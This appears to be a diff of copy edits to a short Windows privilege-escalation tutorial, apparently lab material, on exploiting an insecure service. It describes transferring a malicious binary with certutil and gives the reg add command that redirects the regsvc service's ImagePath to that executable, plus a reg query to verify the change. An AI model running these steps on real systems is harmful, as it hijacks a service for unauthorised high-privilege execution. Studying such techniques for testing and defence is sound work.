Exploiting Insecure Service with Metasploit¶

 -

-Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
+Host the binary using a Python HTTP server and transfer it to the target machine with certutil

 -

-change the ImagePath on the regsvc service registry key to point to our malicious executable.
-We can do this using the following command:
+Change the ImagePath on the regsvc service registry key to point to the malicious executable

 reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /v ImagePath /t REG_EXPAND_SZ /d c:\temp\hackfast.exe /f

-NOTE: we can check if ImagePath set properly with following commands:
+Note: Verify if ImagePath was set properly with the following command:

 reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc"